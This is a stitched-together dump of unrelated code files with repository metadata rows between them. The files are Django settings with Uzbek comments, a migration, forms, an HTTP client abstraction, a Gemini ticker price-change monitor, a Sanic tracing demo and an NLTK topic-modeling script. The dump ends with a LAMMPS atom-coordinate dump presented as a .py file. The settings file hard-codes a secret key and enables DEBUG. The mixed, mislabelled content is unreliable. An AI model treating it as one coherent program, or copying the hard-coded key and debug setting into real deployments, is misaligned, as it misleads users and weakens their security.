# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-jod$glnf4*4&(_812i50)fb(9weaytnic1#!!*-5m42@jmbof*' #barcha djangoda uzizng maxsus maxfiy kaliti mavjud buladi
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True #ager saytda qandaydiz muamoga duj kelsa shu orqaali bizga xaabar yetqaziladi
ALLOWED_HOSTS = []
# Application definition
# sayt ichidagi ilovalar uchun (app) shu yerda ruyhatdan utish kk
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#yaratgan ilovalarimizni shu yerga kiritib ketamiz
'products',
'pages',
'blog',
]
#Bizning kupgina request larimizni shu orqali maxfiy holatga keltirishimiz mumkin buldi
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
#bu yul a herf kabi
ROOT_URLCONF = 'trydjango.urls'
import os
#Html faylarimiz shu yerdan ruyhatdan utkaziladi
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
#shu yerga html kodimizni berib utamiz
'DIRS': [os.path.join(BASE_DIR,"templates") ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'trydjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
#malumotlar bazasi asosan sqlite
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
#rasm va css va js faylar uchun
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
]
| |
0733674fe504df151b23c469f99ef7d29df5489a | ac7828a5fb10daaba998a09b427de3076d3b06d8 | /cnems/bbc/migrations/0011_comments.py | 6f9bdeacd4e9f87e4b20563d4d02dab42fdb6293 | []
| no_license | zkq123/django_1 | 950b1e8b4f94542e78e17de2744d212a7ac00ac9 | 9c5b498f7314ad9283da32b4a0e3793674bb7a7f | refs/heads/master | 2022-11-07T02:12:33.318288 | 2018-12-08T02:26:19 | 2018-12-08T02:26:19 | 155,974,478 | 0 | 1 | null | 2022-10-07T22:55:44 | 2018-11-03T10:55:35 | Python | UTF-8 | Python | false | false | 765 | py | # Generated by Django 2.1.2 on 2018-12-04 12:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('bbc', '0010_remove_likes_sum'),
]
operations = [
migrations.CreateModel(
name='Comments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment_center', models.CharField(max_length=200)),
('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbc.News')),
('users', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbc.Users')),
],
),
]
| [
"[email protected]"
]
| |
58893a54c197fb68eeb0d035302bf64d8d6e53e9 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/3/gD3.py | aa7152104068969fce4fab0f59d40adbf339df10 | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'gD3':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
]
| |
ec782cbc862fb7d8fded12eba2199a87bd70e120 | b186f73f14b5e93e763bc284cc0ca5737ad40c4a | /blog/forms.py | aa355e8bb86cd10ec6099e3cf945812cc5097ee6 | []
| no_license | basmaaitbelarbi/blog_django | ba667174ecd7209c49b00a48e7f42b4fdf92c96d | af763b2db0704c9d41c2d3355a30f29b30ef8bf5 | refs/heads/master | 2021-05-23T14:41:36.841520 | 2020-04-24T00:25:03 | 2020-04-24T00:25:03 | 253,344,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | from django import forms
from .models import Comment, Post
#ntest cmass
class NewComment(forms.ModelForm):
class Meta:
model = Comment
fields = ('name', 'email', 'body')
class PostCreateForm(forms.ModelForm):
title = forms.CharField(label='title')
content = forms.CharField(label='content', widget=forms.Textarea)
class Meta:
model = Post
fields = ['title', 'content']
| [
"[email protected]"
]
| |
9ac71ff258e15cccc153cde0ad3f3d89c6d93d2d | 3850b80059dc5105504c56300dbbc5c70d3ac533 | /models/__init__.py | a495e6c3da7339c6a90a4c7d428ad2be25088dba | []
| no_license | haohaom1/intrinsic-images | cea56f6991dbdde89dd26621716a08c5f51f7ac4 | e3e0ddf85b843c3aa93bccf717f80364a15c38b0 | refs/heads/master | 2022-12-05T08:37:31.138944 | 2021-08-12T16:07:06 | 2021-08-12T16:07:06 | 193,809,832 | 0 | 3 | null | 2022-11-22T03:59:22 | 2019-06-26T01:45:51 | Python | UTF-8 | Python | false | false | 34 | py | # file to make this folder a model | [
"[email protected]"
]
| |
15b6ae2d70b9799cb8748159e727ba2aff01ca67 | a7b4bd1db26f71ab941076691d894583e167a3fd | /tools/cli_auto_doc.py | 3fa4e46f23cc9b1663fdece8826ea5510b80263b | [
"Apache-2.0"
]
| permissive | Mirantis/stackalytics | c422ccb27baa3f1fd7e68b9732ba0203144a3657 | 96ec7c6c630a9f2532b808069e045d434bbac200 | refs/heads/master | 2021-01-18T21:58:38.904481 | 2017-01-25T11:14:12 | 2017-01-25T11:14:12 | 10,863,780 | 3 | 4 | Apache-2.0 | 2020-02-26T11:45:53 | 2013-06-22T11:17:28 | Python | UTF-8 | Python | false | false | 1,806 | py | # Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
try:
import ConfigParser as configparser
except ImportError:
import configparser
def split_multiline(value):
value = [element for element in
(line.strip() for line in value.split('\n'))
if element]
return value
def get_entry_points(config):
if 'entry_points' not in config:
return {}
return dict((option, split_multiline(value))
for option, value in config['entry_points'].items())
def make(cfg, dest):
parser = configparser.RawConfigParser()
parser.read(cfg)
config = {}
for section in parser.sections():
config[section] = dict(parser.items(section))
entry_points = get_entry_points(config)
console_scripts = entry_points.get('console_scripts')
if console_scripts:
for item in console_scripts:
tool = item.split('=')[0].strip()
print('Running %s' % tool)
os.system('%(tool)s --help > %(dest)s/%(tool)s.txt' %
dict(tool=tool, dest=dest))
if len(sys.argv) < 2:
print('Usage: cli_auto_doc <dest folder>')
sys.exit(1)
print('Generating docs from help to console tools')
make(cfg='setup.cfg', dest=sys.argv[1])
| [
"[email protected]"
]
| |
3ec32164666ac523827540b3380e72da6133f4c2 | 0d73e045f83f1765b9d598f9cebb2ec328353c99 | /15A Reading the Program.py | 89eeeace4a4fbac67b9fb6dd0f9013bfac0e2e2d | []
| no_license | Jalbanese1441/Waterloo-CS-Circles-Solutions | 642553db986cf7d53af133eb79a9abc097107a91 | 0506e2f7f62ec9ff4a5fc412b0526995164844ab | refs/heads/master | 2023-02-01T18:09:57.375959 | 2020-12-18T23:50:18 | 2020-12-18T23:50:18 | 277,946,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | def getBASIC():
holder=[]
x=""
while x.endswith("END")==False:
x=input()
holder.append(x)
return holder
| [
"[email protected]"
]
| |
56bfee5ce1520cf5059f5913eee9d2238b793119 | eda3d6974a60a42a1ee35cd2327218029490a654 | /develop/sanic_aiozipkin_test.py | 9433fc32d133111cb645f42c7070691073e2669f | []
| no_license | 1260228859/EvanKao-ms | 4a4159123bfd3f3b960c9b81ca920f599fffc6cc | ae0e9dbf2803c6bd67ea8b0be012b64c57db7bbc | refs/heads/master | 2020-09-26T19:39:48.587556 | 2020-07-08T03:00:01 | 2020-07-08T03:00:01 | 226,328,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,131 | py | from sanic import Sanic, response
from sanic.response import json
import aiohttp
import aiozipkin as az
"""
integrate aiohttp to Sanic app, doc(CHN): https://www.jianshu.com/p/17bc4518b243
"""
host = '127.0.0.1'
port = 8000
zipkin_address = 'http://127.0.0.1:9411/api/v2/spans'
app = Sanic(__name__)
endpoint = az.create_endpoint('sanic_app', ipv4=host, port=port)
@app.listener('before_server_start')
async def init(app, loop):
tracer = await az.create(zipkin_address, endpoint, sample_rate=1.0)
trace_config = az.make_trace_config(tracer)
app.aiohttp_session = aiohttp.ClientSession(trace_configs=[trace_config], loop=loop)
app.tracer = tracer
@app.listener('after_server_stop')
def finish(app, loop):
loop.run_until_complete(app.aiohttp_session.close())
loop.close()
@app.route("/")
async def test(request):
request['aiozipkin_span'] = request
with app.tracer.new_trace() as span:
span.name(f'HTTP {request.method} {request.path}')
print(span)
url = "https://www.163.com"
with app.tracer.new_child(span.context) as span_producer:
span_producer.kind(az.PRODUCER)
span_producer.name('produce event click')
return response.text('ok')
def request_span(request):
with app.tracer.new_trace() as span:
span.name(f'HTTP {request.method} {request.path}')
kwargs = {
'http.path':request.path,
'http.method':request.method,
'http.path':request.path,
'http.route':request.url,
'peer.ip':request.remote_addr or request.ip,
'peer.port':request.port,
}
[span.tag(k, v) for k,v in kwargs.items()]
span.kind(az.SERVER)
return span
@app.route("/2")
async def tes2(request):
request['aiozipkin_span'] = request
span = request_span(request)
with app.tracer.new_child(span.context) as span_producer:
span_producer.kind(az.PRODUCER)
span_producer.name('produce event click')
return response.text('ok')
if __name__ == '__main__':
app.run(host="0.0.0.0", port=port, debug=True)
| [
"[email protected]"
]
| |
1a8b3763c8a94e48cf8da659c686babc72716600 | 80abe7427ca501da06a9507cefa52d5c290f2833 | /Chapter04/topic_modeling.py | 841891d56168915143ec57282aeab11713c75372 | []
| no_license | CodedQuen/Raspberry-Pi-3-Cookbook-for-Python-Programmers | 7910c9cf9ebaf6f42510bd531bf965fd03e6efe8 | 4a77452c4510fd9c7da62099a93fdbc95a86245a | refs/heads/master | 2022-06-10T04:36:59.316284 | 2020-05-05T10:18:33 | 2020-05-05T10:18:33 | 261,421,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,220 | py |
from nltk.tokenize import RegexpTokenizer
from nltk.stem.snowball import SnowballStemmer
from gensim import models, corpora
from nltk.corpus import stopwords
# Load input words
def load_words(in_file):
element = []
with open(in_file, 'r') as f:
for line in f.readlines():
element.append(line[:-1])
return element
# Class to preprocedure of text
class Preprocedure(object):
# Initialize various operators
def __init__(self):
# Create a regular expression tokenizer
self.tokenizer = RegexpTokenizer(r'\w+')
# get the list of stop words
self.english_stop_words= stopwords.words('english')
# Create a Snowball stemmer
self.snowball_stemmer = SnowballStemmer('english')
# Tokenizing, stop word removal, and stemming
def procedure(self, in_data):
# Tokenize the string
token = self.tokenizer.tokenize(in_data.lower())
# Remove the stop words
tokenized_stopwords = [x for x in token if not x in self.english_stop_words]
# Perform stemming on the tokens
token_stemming = [self.snowball_stemmer.stem(x) for x in tokenized_stopwords]
return token_stemming
if __name__=='__main__':
# File containing linewise input data
in_file = 'data_topic_modeling.txt'
# Load words
element = load_words(in_file)
# Create a preprocedure object
preprocedure = Preprocedure()
# Create a list for processed documents
processed_tokens = [preprocedure.procedure(x) for x in element]
# Create a dictionary based on the tokenized documents
dict_tokens = corpora.Dictionary(processed_tokens)
corpus = [dict_tokens.doc2bow(text) for text in processed_tokens]
# Generate the LDA model based on the corpus we just created
num_of_topics = 2
num_of_words = 4
ldamodel = models.ldamodel.LdaModel(corpus,
num_topics=num_of_topics, id2word=dict_tokens, passes=25)
print "Most contributing words to the topics:"
for item in ldamodel.print_topics(num_topics=num_of_topics, num_words=num_of_words):
print "\nTopic", item[0], "==>", item[1]
| [
"[email protected]"
]
| |
be1bf8bedb3397c20eaccb3b6536f27ed3bc8b82 | aab904ff48ee50db955ec844e5663a64404a1042 | /gemini.py | 8d0795d7c7c3de2e37d8d6b183f5eaf3dfa8072f | []
| no_license | walazdev/GeminiChallenge | b5bd82aefe2768b949589793a5c526e3e78893d5 | 459d38385c84697f188893b8d5f8e07cec29b4d2 | refs/heads/main | 2023-04-01T17:19:21.405599 | 2021-03-22T17:37:19 | 2021-03-22T17:37:19 | 350,207,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,733 | py | import requests, json, sys, time, datetime
def main():
userInput = sys.argv[1]
try:
userInputFloat = float(userInput)
except ValueError:
print("Usage: python3 gemini.py [% threshold]")
print("[% threshold] has to be a number")
sys.exit(1)
if (len(sys.argv) != 2):
print("Usage: python3 gemini.py [% threshold]")
sys.exit(1)
print("User % change threshold:", sys.argv[1])
# get tickers and sort by alphabetical order
print(datetime.datetime.now(), "- INFO: Retrieving tickers")
ticker_url = "https://api.gemini.com/v1/symbols"
response = requests.get(ticker_url)
tickers = sorted(response.json())
while True:
for i in range (0, len(tickers)):
# Get general information about specific ticker from list of tickers.
# The information that will be of use is: open price (opening price 24hr ago), ask (current best offer)
timestamp = datetime.datetime.now()
specificTicker = tickers[i]
tickerURL = "https://api.gemini.com/v2/ticker/" + specificTicker
tickerInfo = requests.get(tickerURL).json()
# On 3/22/2021, 7 more tickers were added, some of which had no information (or None) in certain keys
# The code below is to account for these new tickers without information, as the code would throw errors if no information was present
if tickerInfo['ask'] == None:
continue
print(timestamp, "- INFO: Fetched", specificTicker, "information")
# uncomment line below to adhere to API rate limits
# time.sleep(1.0)
# Retrieve and compute price information
openPrice = float(tickerInfo['open'])
currentPrice = float(tickerInfo['ask'])
percentPriceChange = get24hrPriceChange(currentPrice, openPrice)
# Price change threshold exceeded
if abs(percentPriceChange) > userInputFloat:
print(timestamp, "- ERROR:", specificTicker, "***** PRICE CHANGE *****")
# Price change threshold NOT exceeded (in either direction, +/-)
else:
print(timestamp, "- INFO:", specificTicker, "has not exceeded threshold")
# Print general information on the ticker of interest, regardless of price change status
print(timestamp, "|", specificTicker, "| Current price:", currentPrice, "| Open price:", openPrice, "| % change:", round(percentPriceChange, 2))
def get24hrPriceChange(finalPrice, startPrice):
result = ((finalPrice - startPrice) / startPrice) * 100
return result
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
25e2f3a9ceb559034509a531ca8eec0c56c15cdc | 9fcf684509bf39dbd7fcf7999e847b88ffb27a44 | /facebookbot/http_client.py | 6ec1347131f9b4cf5b5e5e61f03e3e3dc1b1d139 | [
"Apache-2.0"
]
| permissive | tailin/python-messengerbot-sdk | 916dd36279828ea76d21a5c90e26cf93c8ef1934 | cbe04b1a6b94b7cd7c04d06348737c041643b242 | refs/heads/master | 2020-04-27T11:31:09.368708 | 2019-03-07T07:00:25 | 2019-03-07T07:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,280 | py | from __future__ import unicode_literals
from abc import ABCMeta, abstractmethod, abstractproperty
import requests
from future.utils import with_metaclass
class HttpClient(with_metaclass(ABCMeta)):
"""Abstract Base Classes of HttpClient."""
DEFAULT_TIMEOUT = 5
def __init__(self, timeout=DEFAULT_TIMEOUT):
"""__init__ method.
:param timeout: (optional) How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`DEFAULT_TIMEOUT`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
self.timeout = timeout
@abstractmethod
def get(self, url, headers=None, params=None, stream=False, timeout=None):
"""GET request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param dict params: (optional) Request query parameter
:param bool stream: (optional) get content as stream
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
@abstractmethod
def post(self, url, headers=None, params=None, data=None, timeout=None):
"""POST request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
@abstractmethod
def delete(self, url, headers=None, data=None, timeout=None):
"""DELETE request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: T <= :py:class:`HttpResponse`
:return: HttpResponse instance
"""
raise NotImplementedError
class RequestsHttpClient(HttpClient):
"""HttpClient implemented by requests."""
def __init__(self, timeout=HttpClient.DEFAULT_TIMEOUT):
"""__init__ method.
:param timeout: (optional) How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`DEFAULT_TIMEOUT`
:type timeout: float | tuple(float, float)
"""
super(RequestsHttpClient, self).__init__(timeout)
def get(self, url, headers=None, params=None, stream=False, timeout=None):
"""GET request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param dict params: (optional) Request query parameter
:param bool stream: (optional) get content as stream
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.get(
url, headers=headers, params=params, stream=stream, timeout=timeout
)
return RequestsHttpResponse(response)
def post(self, url, headers=None, params=None, data=None, timeout=None):
"""POST request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.post(
url, headers=headers, params=params, data=data, timeout=timeout
)
return RequestsHttpResponse(response)
def delete(self, url, headers=None, data=None, timeout=None):
"""DELETE request.
:param str url: Request url
:param dict headers: (optional) Request headers
:param data: (optional) Dictionary, bytes, or file-like object to send in the body
:param timeout: (optional), How long to wait for the server
to send data before giving up, as a float,
or a (connect timeout, read timeout) float tuple.
Default is :py:attr:`self.timeout`
:type timeout: float | tuple(float, float)
:rtype: :py:class:`RequestsHttpResponse`
:return: RequestsHttpResponse instance
"""
if timeout is None:
timeout = self.timeout
response = requests.delete(
url, headers=headers, data=data, timeout=timeout
)
return RequestsHttpResponse(response)
class HttpResponse(with_metaclass(ABCMeta)):
"""HttpResponse."""
@abstractproperty
def status_code(self):
"""Get status code."""
raise NotImplementedError
@abstractproperty
def headers(self):
"""Get headers."""
raise NotImplementedError
@abstractproperty
def text(self):
"""Get request body as text-decoded."""
raise NotImplementedError
@abstractproperty
def content(self):
"""Get request body as binary."""
raise NotImplementedError
@abstractproperty
def json(self):
"""Get request body as json-decoded."""
raise NotImplementedError
@abstractmethod
def iter_content(self, chunk_size=1024, decode_unicode=False):
"""Get request body as iterator content (stream).
:param int chunk_size:
:param bool decode_unicode:
"""
raise NotImplementedError
class RequestsHttpResponse(HttpResponse):
"""HttpResponse implemented by requests lib's response."""
def __init__(self, response):
"""__init__ method.
:param response: requests lib's response
"""
self.response = response
@property
def status_code(self):
"""Get status code."""
return self.response.status_code
@property
def headers(self):
"""Get headers."""
return self.response.headers
@property
def text(self):
"""Get request body as text-decoded."""
return self.response.text
@property
def content(self):
"""Get request body as binary."""
return self.response.content
@property
def json(self):
"""Get request body as json-decoded."""
return self.response.json()
def iter_content(self, chunk_size=1024, decode_unicode=False):
"""Get request body as iterator content (stream).
:param int chunk_size:
:param bool decode_unicode:
"""
return self.response.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode) | [
"[email protected]"
]
| |
825006c894ca28563ceb49ebb22caa4eb6aead20 | 4e0c1615c467c63524db9a33d0e769f1370f5a12 | /python-ops/training/exercise/test/murthy/r30.py | ae1cc0288d7548781efef0cae97dc498836eb388 | []
| no_license | infra-ops/cloud-ops | 1afb44ed29000491aaa5420ebc6e0b8d740fc55c | 4f676fde13f33c838f7f17affd705966a6d31da2 | refs/heads/master | 2023-08-27T03:00:32.867645 | 2023-08-23T14:27:59 | 2023-08-23T14:27:59 | 140,283,053 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | values = [100,200,300,400]
slice = values[1:3]
print(slice)
| [
"[email protected]"
]
| |
4968c79739666e8ad2edd13f77a4d5034eea9c2e | 649bd422025e421d86025743eac324c9b882a2e8 | /exam/1_three-dimensional_atomic_system/dump/phasetrans/temp45_9000.py | 4d4f26e616aa9b6ced1b2bb6742aa541c91b1e07 | []
| no_license | scheuclu/atom_class | 36ddee1f6a5995872e858add151c5942c109847c | 0c9a8c63d9b38898c1869fe8983126cef17662cd | refs/heads/master | 2021-01-21T10:52:28.448221 | 2017-03-07T23:04:41 | 2017-03-07T23:04:41 | 83,489,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,965 | py | ITEM: TIMESTEP
9000
ITEM: NUMBER OF ATOMS
2048
ITEM: BOX BOUNDS pp pp pp
7.1778912625688207e-01 4.6482210873740115e+01
7.1778912625688207e-01 4.6482210873740115e+01
7.1778912625688207e-01 4.6482210873740115e+01
ITEM: ATOMS id type xs ys zs
8 1 0.128064 0.0616737 0.0601487
35 1 0.0656057 0.120012 0.0619676
130 1 0.0685266 0.0608412 0.125938
165 1 0.131318 0.120832 0.125956
1268 1 0.497119 0.93268 0.182308
1361 1 0.496588 0.750478 0.240454
133 1 0.126633 1.00601 0.124891
1460 1 0.500803 0.688928 0.435722
12 1 0.250297 0.0562202 0.0614448
39 1 0.192212 0.12316 0.0614049
43 1 0.310904 0.126252 0.0601463
134 1 0.189034 0.058369 0.123643
138 1 0.309645 0.0635839 0.120587
169 1 0.251645 0.126535 0.118547
137 1 0.247687 0.998671 0.125268
1505 1 -0.00176351 0.879562 0.375917
1090 1 0.0589042 0.812625 -0.00200376
16 1 0.373189 0.060716 0.0622224
47 1 0.438316 0.126239 0.0610428
142 1 0.437451 0.0601493 0.122661
173 1 0.378996 0.12285 0.11939
141 1 0.372617 1.00299 0.12081
15 1 0.439286 0.00251552 0.0601038
1124 1 0.000200366 0.942055 0.0542765
40 1 0.123702 0.18568 0.0616187
67 1 0.0646421 0.253388 0.0630245
72 1 0.12164 0.314239 0.0652134
162 1 0.0610812 0.179524 0.12545
194 1 0.0576994 0.309699 0.127795
197 1 0.123288 0.249691 0.120972
1641 1 0.243923 0.878471 0.504706
353 1 -4.25247e-05 0.36814 0.246475
42 1 0.312772 0.188421 -0.000934665
44 1 0.251675 0.196724 0.0615479
71 1 0.188218 0.252487 0.0601214
75 1 0.317639 0.248913 0.0683485
76 1 0.249202 0.315718 0.0597648
166 1 0.186483 0.190151 0.118945
170 1 0.318594 0.185733 0.127466
198 1 0.185731 0.312591 0.120281
201 1 0.248152 0.254854 0.127487
202 1 0.31761 0.313972 0.119253
340 1 0.49425 0.316618 0.314526
48 1 0.378232 0.186003 0.0651367
79 1 0.438053 0.251286 0.0629577
80 1 0.37839 0.312127 0.0577043
174 1 0.440193 0.18599 0.127182
205 1 0.380049 0.250952 0.125125
206 1 0.437785 0.319056 0.121805
1473 1 0.00366176 0.754869 0.374141
1169 1 0.501797 0.496945 0.123152
99 1 0.0652059 0.377204 0.0671047
104 1 0.130785 0.437832 0.0599418
226 1 0.0653255 0.431762 0.124595
229 1 0.130258 0.376473 0.121647
1157 1 0.125964 0.494957 0.124186
1645 1 0.372234 0.871195 0.501377
1281 1 -0.00107149 0.500479 0.250666
180 1 0.503362 0.186886 0.188477
103 1 0.186807 0.373728 0.0608981
107 1 0.317603 0.377198 0.0633315
108 1 0.252165 0.438418 0.061388
230 1 0.188993 0.439229 0.120675
233 1 0.247896 0.378781 0.126012
234 1 0.312021 0.441367 0.124453
1035 1 0.312601 0.505172 0.0603768
1236 1 0.495387 0.816815 0.186807
77 1 0.376869 0.246907 -0.0038311
111 1 0.439765 0.373956 0.0617845
112 1 0.378935 0.440822 0.0633536
237 1 0.376515 0.378723 0.125523
238 1 0.439402 0.436295 0.128258
1165 1 0.374516 0.498781 0.128345
10 1 0.313335 0.0635035 0.00239691
1518 1 0.436539 0.939934 0.372265
404 1 0.495014 0.0614877 0.441303
1027 1 0.0615267 0.494489 0.0656524
1032 1 0.122919 0.560398 0.0604642
1059 1 0.0600784 0.625129 0.0666329
1154 1 0.0623433 0.560911 0.129236
1189 1 0.125564 0.623536 0.126188
1517 1 0.373563 0.872828 0.38073
526 1 0.434098 0.0635261 0.499805
45 1 0.376622 0.127572 -0.00151715
1161 1 0.252976 0.505641 0.124012
1031 1 0.189052 0.500772 0.060167
1036 1 0.247119 0.565256 0.0624889
1063 1 0.186865 0.62311 0.0601622
1067 1 0.314961 0.628527 0.0609443
1158 1 0.183851 0.55771 0.121548
1162 1 0.315458 0.566389 0.12391
1193 1 0.24685 0.618006 0.126501
73 1 0.255723 0.254866 0.00159523
276 1 0.498132 0.0616439 0.312336
292 1 -0.000855735 0.18199 0.313154
1039 1 0.440855 0.498033 0.0604513
1040 1 0.377536 0.565027 0.0617404
1071 1 0.435508 0.62586 0.0629231
1166 1 0.434639 0.560493 0.127884
1197 1 0.373824 0.627258 0.126695
1064 1 0.12404 0.684612 0.0676066
1091 1 0.0625377 0.750335 0.0570339
1096 1 0.124176 0.812646 0.0626356
1186 1 0.0654683 0.685662 0.133279
1218 1 0.0631242 0.812612 0.128775
1221 1 0.119685 0.749536 0.126446
1538 1 0.0579054 0.562888 0.500989
1519 1 0.438729 0.881673 0.43737
1058 1 0.0632657 0.683946 -0.00315472
401 1 0.496951 1.00103 0.375212
1068 1 0.248596 0.682303 0.0628255
1095 1 0.187501 0.744823 0.0615051
1099 1 0.311162 0.748619 0.0570169
1100 1 0.251631 0.812802 0.0618844
1190 1 0.185829 0.686611 0.12615
1194 1 0.313421 0.683137 0.125319
1222 1 0.186526 0.81082 0.120182
1225 1 0.25031 0.751117 0.123451
1226 1 0.3149 0.811161 0.119609
1072 1 0.373794 0.686397 0.0575702
1103 1 0.441103 0.74609 0.0642725
1104 1 0.381761 0.808032 0.0629057
1198 1 0.438451 0.683202 0.123451
1229 1 0.37382 0.743217 0.120781
1230 1 0.433988 0.812488 0.123951
1396 1 0.495325 0.940886 0.309992
1476 1 0.00279954 0.815318 0.443657
4 1 0.00268231 0.0581827 0.0581558
1093 1 0.126199 0.745718 0.00234561
497 1 0.499164 0.378573 0.375227
522 1 0.312447 0.0605191 0.497947
1520 1 0.371576 0.93517 0.437435
3 1 0.0674949 0.994957 0.0630218
1123 1 0.059326 0.877502 0.0597483
1128 1 0.127883 0.931594 0.0623519
1250 1 0.0612731 0.937854 0.126495
1253 1 0.126191 0.876586 0.126658
1156 1 -0.000827386 0.558044 0.189483
589 1 0.370624 0.25181 0.503365
129 1 -0.00192829 1.00219 0.127046
148 1 0.502587 0.0619035 0.182207
7 1 0.184516 0.00143089 0.0600096
11 1 0.31236 0.99826 0.0663178
1127 1 0.186899 0.874887 0.0576461
1131 1 0.312698 0.878384 0.0579517
1132 1 0.248208 0.933403 0.0584845
1254 1 0.188238 0.93732 0.123193
1257 1 0.246739 0.874119 0.123142
1258 1 0.311784 0.936281 0.126723
132 1 -0.00453866 0.060552 0.186355
1135 1 0.435933 0.875127 0.0621282
1136 1 0.374582 0.937844 0.0647127
1261 1 0.379724 0.87299 0.120824
